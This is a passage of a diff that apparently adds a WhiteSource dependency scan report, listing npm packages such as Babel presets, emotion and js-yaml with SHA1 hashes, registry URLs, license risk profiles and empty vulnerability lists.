"THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/runtime/v/7.6.3" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ca49e3e3-821c-47f9-bdff-6efe5bc041ff", + "keyId": 28433743, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/preset-react/-/preset-react-7.6.3.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/preset-react" + }, + "matchType": "SHA1", + "sha1": "d5242c828322520205ae4eda5d4f4f618964e2f6", + "name": "preset-react-7.6.3.tgz", + "artifactId": "preset-react-7.6.3.tgz", + "version": "7.6.3", + "groupId": "@babel/preset-react", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/633b4f04-5887-4d7f-9f9e-1d62cf386a11" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d19b7ddc-2ae3-413d-be96-2566c816910c", + "keyId": 27840820, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-proposal-class-properties/-/plugin-proposal-class-properties-7.5.5.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-proposal-class-properties" + }, + "matchType": "SHA1", + "sha1": "a974cfae1e37c3110e71f3c6a2e48b8e71958cd4", + "name": "plugin-proposal-class-properties-7.5.5.tgz", + "artifactId": "plugin-proposal-class-properties-7.5.5.tgz", + "version": "7.5.5", + "groupId": "@babel/plugin-proposal-class-properties", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/40dee4ae-b996-4c52-930f-b4472299a26c" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3b676388-3f49-4408-9e42-052faab327d5", + "keyId": 28202854, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/preset-typescript/-/preset-typescript-7.6.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/preset-typescript" + }, + "matchType": "SHA1", + "sha1": "25768cb8830280baf47c45ab1a519a9977498c98", + "name": "preset-typescript-7.6.0.tgz", + "artifactId": "preset-typescript-7.6.0.tgz", + "version": "7.6.0", + "groupId": "@babel/preset-typescript", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b3e68150-2b6a-4fee-a2c0-5fae9da2e0e1", + "keyId": 28531336, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@ampproject/toolbox-optimizer/-/toolbox-optimizer-1.1.1.tgz", + "homePage": "https://github.com/ampproject/amp-toolbox/tree/master/packages/optimizer", + "genericPackageIndex": "https://www.npmjs.org/package/@ampproject/toolbox-optimizer" + }, + "matchType": "SHA1", + "sha1": "be66245c966ba9b0f5e3020109f87fea90ea377d", + "name": "toolbox-optimizer-1.1.1.tgz", + "artifactId": "toolbox-optimizer-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@ampproject/toolbox-optimizer", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/525b5cf2-ae6c-42d7-941f-726842ad5820" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0afc71e5-5a70-446a-9043-6f99e78a6b6b", + "keyId": 28397375, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/runtime-corejs2/-/runtime-corejs2-7.6.3.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/runtime-corejs2" + }, + "matchType": "SHA1", + "sha1": "de3f446b3fb688b98cbd220474d1a7cad909bcb8", + "name": "runtime-corejs2-7.6.3.tgz", + "artifactId": "runtime-corejs2-7.6.3.tgz", + "version": "7.6.3", + "groupId": "@babel/runtime-corejs2", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ccd6bd7f-8788-44df-9267-b5bc0970204f" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7fb53640-a14e-4b7a-bab4-926b72ec775f", + "keyId": 27100349, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.2.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-syntax-jsx" + }, + "matchType": "SHA1", + "sha1": "0b85a3b4bc7cdf4cc4b8bf236335b907ca22e7c7", + "name": "plugin-syntax-jsx-7.2.0.tgz", + "artifactId": "plugin-syntax-jsx-7.2.0.tgz", + "version": "7.2.0", + "groupId": "@babel/plugin-syntax-jsx", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c86b896e-408f-4e77-9032-c4c7385461c6" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "79b6a51b-b56a-4f59-bef7-858d1057faff", + "keyId": 28353251, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/preset-env/-/preset-env-7.6.3.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/preset-env" + }, + "matchType": "SHA1", + "sha1": "9e1bf05a2e2d687036d24c40e4639dc46cef2271", + "name": "preset-env-7.6.3.tgz", + "artifactId": "preset-env-7.6.3.tgz", + "version": "7.6.3", + "groupId": "@babel/preset-env", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c460cd6c-6158-47a3-a051-2bbc93c3a437" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "843382fa-90cb-4f64-891c-af8cbab0daec", + "keyId": 27863666, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz", + "homePage": "https://github.com/estools/esutils", + "genericPackageIndex": "https://www.npmjs.org/package/esutils" + }, + "matchType": "SHA1", + "sha1": "74d2eb4de0b8da1293711910d50775b9b710ef64", + "name": "esutils-2.0.3.tgz", + "artifactId": "esutils-2.0.3.tgz", + "version": "2.0.3", + "groupId": "esutils", + "licenses": [ + { + "name": "BSD 2", + "url": "http://opensource.org/licenses/bsd-license", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/755aea9c-c4af-40ee-9832-0c09a81c2a01" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1e543718-83d7-4443-a3c1-085828d9dd94", + "keyId": 27037495, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/touch/-/touch-1.0.0.tgz", + "homePage": "https://github.com/isaacs/node-touch#readme", + "genericPackageIndex": "https://www.npmjs.org/package/touch" + }, + "matchType": "SHA1", + "sha1": "449cbe2dbae5a8c8038e30d71fa0ff464947c4de", + "name": "touch-1.0.0.tgz", + "artifactId": "touch-1.0.0.tgz", + "version": "1.0.0", + "groupId": "touch", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/touch/v/1.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9b6bdd30-d339-4078-bcac-0fa575c6a397", + "keyId": 28538971, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/stylis-rule-sheet/-/stylis-rule-sheet-0.0.5.tgz", + "homePage": "https://github.com/thysultan/stylis.js", + "genericPackageIndex": "https://www.npmjs.org/package/stylis-rule-sheet" + }, + "matchType": "SHA1", + "sha1": "ebae935cc1f6fb31b9b62dba47f2ea8b833dad9f", + "name": "stylis-rule-sheet-0.0.5.tgz", + "artifactId": "stylis-rule-sheet-0.0.5.tgz", + "version": "0.0.5", + "groupId": "stylis-rule-sheet", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/stylis-rule-sheet/v/0.0.5" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "66d6cce9-d31c-4c29-9d2d-610eb1da0029", + "keyId": 27004859, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/query-string/-/query-string-5.1.1.tgz", + "homePage": "https://github.com/sindresorhus/query-string#readme", + "genericPackageIndex": "https://www.npmjs.org/package/query-string" + }, + "matchType": "SHA1", + "sha1": "a78c012b71c17e05f2e3fa2319dd330682efb3cb", + "name": "query-string-5.1.1.tgz", + "artifactId": "query-string-5.1.1.tgz", + "version": "5.1.1", + "groupId": "query-string", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/86fd91f5-efce-4f8e-bb4f-e1090e27ed49" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ff3545a4-052a-40e3-b3a8-67119b11f184", + "keyId": 26966742, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz", + "homePage": "https://github.com/floatdrop/require-from-string#readme", + "genericPackageIndex": "https://www.npmjs.org/package/require-from-string" + }, + "matchType": "SHA1", + "sha1": "89a7fdd938261267318eafe14f9c32e598c36909", + "name": "require-from-string-2.0.2.tgz", + "artifactId": "require-from-string-2.0.2.tgz", + "version": "2.0.2", + "groupId": "require-from-string", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/require-from-string/v/2.0.2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d7fd6b43-342d-4d14-a7d0-1c99cdc47af2", + "keyId": 28538966, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/emotion/-/emotion-8.0.12.tgz", + "homePage": "https://emotion.sh", + "genericPackageIndex": "https://www.npmjs.org/package/emotion" + }, + "matchType": "SHA1", + "sha1": "03de11ce26b1b2401c334b94d438652124c514c6", + "name": "emotion-8.0.12.tgz", + "artifactId": "emotion-8.0.12.tgz", + "version": "8.0.12", + "groupId": "emotion", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/emotion" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c649e3df-ffb2-4ef2-98d7-f8ea1bde7573", + "keyId": 26955691, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", + "homePage": "https://github.com/alexei/sprintf.js#readme", + "genericPackageIndex": "https://www.npmjs.org/package/sprintf-js" + }, + "matchType": "SHA1", + "sha1": "04e6926f662895354f3dd015203633b857297e2c", + "name": "sprintf-js-1.0.3.tgz", + "artifactId": "sprintf-js-1.0.3.tgz", + "version": "1.0.3", + "groupId": "sprintf-js", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/sprintf-js" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e97fc71a-5221-4eb9-ae13-909f1d23e392", + "keyId": 27134413, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/parse-json/-/parse-json-3.0.0.tgz", + "homePage": "https://github.com/sindresorhus/parse-json#readme", + "genericPackageIndex": "https://www.npmjs.org/package/parse-json" + }, + "matchType": "SHA1", + "sha1": "fa6f47b18e23826ead32f263e744d0e1e847fb13", + "name": "parse-json-3.0.0.tgz", + "artifactId": "parse-json-3.0.0.tgz", + "version": "3.0.0", + "groupId": "parse-json", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b4801ed2-3fa8-4351-b25a-f960a9c41eaa" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3cfa5b94-12e7-4d5f-aac2-5d5c4deaf878", + "keyId": 26950839, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", + "homePage": "https://github.com/nodeca/argparse#readme", + "genericPackageIndex": "https://www.npmjs.org/package/argparse" + }, + "matchType": "SHA1", + "sha1": "bcd6791ea5ae09725e17e5ad988134cd40b3d911", + "name": "argparse-1.0.10.tgz", + "artifactId": "argparse-1.0.10.tgz", + "version": "1.0.10", + "groupId": "argparse", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/aa365f5f-c5e2-495c-899f-47d2aa958adf" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "caba7fa0-5cb8-41eb-a8a0-35b830fb26a2", + "keyId": 27034189, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/find-root/-/find-root-1.1.0.tgz", + "homePage": "https://github.com/js-n/find-root#readme", + "genericPackageIndex": "https://www.npmjs.org/package/find-root" + }, + "matchType": "SHA1", + "sha1": "abcfc8ba76f708c42a97b3d685b7e9450bfb9ce4", + "name": "find-root-1.1.0.tgz", + "artifactId": "find-root-1.1.0.tgz", + "version": "1.1.0", + "groupId": "find-root", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/find-root/v/1.1.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "18a3a716-2ed0-4560-9fdb-1f0b872aa8c7", + "keyId": 28538972, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.0.0-beta.32.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-module-imports" + }, + "matchType": "SHA1", + "sha1": "8126fc024107c226879841b973677a4f4e510a03", + "name": "helper-module-imports-7.0.0-beta.32.tgz", + "artifactId": "helper-module-imports-7.0.0-beta.32.tgz", + "version": "7.0.0-beta.32", + "groupId": "@babel/helper-module-imports", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/cd32e1a7-9fae-44a6-9a49-aade19bfdd83" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "46bb4265-2a05-4d96-be70-520e6c042f7a", + "keyId": 26958754, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/strict-uri-encode/-/strict-uri-encode-1.1.0.tgz", + "homePage": "https://github.com/kevva/strict-uri-encode#readme", + "genericPackageIndex": "https://www.npmjs.org/package/strict-uri-encode" + }, + "matchType": "SHA1", + "sha1": "279b225df1d582b1f54e65addd4352e18faa0713", + "name": "strict-uri-encode-1.1.0.tgz", + "artifactId": "strict-uri-encode-1.1.0.tgz", + "version": "1.1.0", + "groupId": "strict-uri-encode", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/988f5598-a0e9-4bf1-b610-8ea46ff54c76" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "82110017-0e97-4547-86d7-7f92966ba292", + "keyId": 27134558, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cosmiconfig/-/cosmiconfig-3.1.0.tgz", + "homePage": "https://github.com/davidtheclark/cosmiconfig#readme", + "genericPackageIndex": "https://www.npmjs.org/package/cosmiconfig" + }, + "matchType": "SHA1", + "sha1": "640a94bf9847f321800403cd273af60665c73397", + "name": "cosmiconfig-3.1.0.tgz", + "artifactId": "cosmiconfig-3.1.0.tgz", + "version": "3.1.0", + "groupId": "cosmiconfig", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/345638af-8d80-4767-a63f-849b4c366777" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "630dd4be-c4f7-4a47-8c80-4323a1169bcf", + "keyId": 28538968, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/babel-macros/-/babel-macros-1.2.0.tgz", + "homePage": "https://github.com/kentcdodds/babel-macros#readme", + "genericPackageIndex": "https://www.npmjs.org/package/babel-macros" + }, + "matchType": "SHA1", + "sha1": "39e47ed6d286d4a98f1948d8bab45dac17e4e2d4", + "name": "babel-macros-1.2.0.tgz", + "artifactId": "babel-macros-1.2.0.tgz", + "version": "1.2.0", + "groupId": "babel-macros", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c6cb3e2e-4f9f-4cad-8977-26f1f620d514" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "565918fc-f51b-4ff4-893c-7ade1e0d7d21", + "keyId": 28538974, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/babel-plugin-emotion/-/babel-plugin-emotion-8.0.12.tgz", + "homePage": "https://github.com/tkh44/emotion#readme", + "genericPackageIndex": "https://www.npmjs.org/package/babel-plugin-emotion" + }, + "matchType": "SHA1", + "sha1": "2ed844001416b0ae2ff787a06b1804ec5f531c89", + "name": "babel-plugin-emotion-8.0.12.tgz", + "artifactId": "babel-plugin-emotion-8.0.12.tgz", + "version": "8.0.12", + "groupId": "babel-plugin-emotion", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/babel-plugin-emotion/v/8.0.12" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "86fa548d-78ce-4ed7-9ede-5212c106bc0d", + "keyId": 27332845, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.13.1.tgz", + "homePage": "https://github.com/nodeca/js-yaml", + "genericPackageIndex": "https://www.npmjs.org/package/js-yaml" + }, + "matchType": "SHA1", + "sha1": "aff151b30bfdfa8e49e05da22e7415e9dfa37847", + "name": "js-yaml-3.13.1.tgz", + "artifactId": "js-yaml-3.13.1.tgz", + "version": "3.13.1", + "groupId": "js-yaml", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a09499d1-6a37-4bab-b2ba-07bec495772f" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c2b47c79-3fac-412b-a4b1-a18987a17f06", + "keyId": 28538973, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/react-contentful-image/-/react-contentful-image-1.3.2.tgz", + "homePage": "https://bitbucket.org/bensimonbyrne/react-components/packages/react-contentful-image#readme", + "genericPackageIndex": "https://www.npmjs.org/package/react-contentful-image" + }, + "matchType": "SHA1", + "sha1": "396031c7c0afe3188160451e50f1d356c2a6034a", + "name": "react-contentful-image-1.3.2.tgz", + "artifactId": "react-contentful-image-1.3.2.tgz", + "version": "1.3.2", + "groupId": "react-contentful-image", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/react-contentful-image" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d31412f8-2595-4e8f-9ccc-cd6c323d5775", + "keyId": 26955361, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", + "homePage": "http://esprima.org", + "genericPackageIndex": "https://www.npmjs.org/package/esprima" + }, + "matchType": "SHA1", + "sha1": "13b04cdb3e6c5d19df91ab6987a8695619b0aa71", + "name": "esprima-4.0.1.tgz", + "artifactId": "esprima-4.0.1.tgz", + "version": "4.0.1", + "groupId": "esprima", + "licenses": [ + { + "name": "BSD 2", + "url": "http://opensource.org/licenses/bsd-license", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/esprima/v/4.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "dc0a3c00-a6c7-49b3-bb21-2e64b9a0edfc", + "keyId": 28538967, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/types/-/types-7.0.0-beta.32.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/types" + }, + "matchType": "SHA1", + "sha1": "c317d0ecc89297b80bbcb2f50608e31f6452a5ff", + "name": "types-7.0.0-beta.32.tgz", + "artifactId": "types-7.0.0-beta.32.tgz", + "version": "7.0.0-beta.32", + "groupId": "@babel/types", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/types" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3a8a222f-8409-41c1-9b51-157cde52cbd0", + "keyId": 28538975, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/emotion-utils/-/emotion-utils-8.0.12.tgz", + "homePage": "https://github.com/tkh44/emotion#readme", + "genericPackageIndex": "https://www.npmjs.org/package/emotion-utils" + }, + "matchType": "SHA1", + "sha1": "5e0fd72db3008f26ce4f80b1972df08841df2168", + "name": "emotion-utils-8.0.12.tgz", + "artifactId": "emotion-utils-8.0.12.tgz", + "version": "8.0.12", + "groupId": "emotion-utils", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/emotion-utils/v/8.0.12" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c8fa46a6-2560-4258-8b73-87471d30a06a", + "keyId": 28650563, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-create-class-features-plugin/-/helper-create-class-features-plugin-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-create-class-features-plugin" + }, + "matchType": "SHA1", + "sha1": "bcdc223abbfdd386f94196ae2544987f8df775e8", + "name": "helper-create-class-features-plugin-7.7.0.tgz", + "artifactId": "helper-create-class-features-plugin-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/helper-create-class-features-plugin", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/helper-create-class-features-plugin/v/7.7.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e362778c-2c30-41d4-aa25-4a1fc38cb2aa", + "keyId": 28484759, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.3.tgz", + 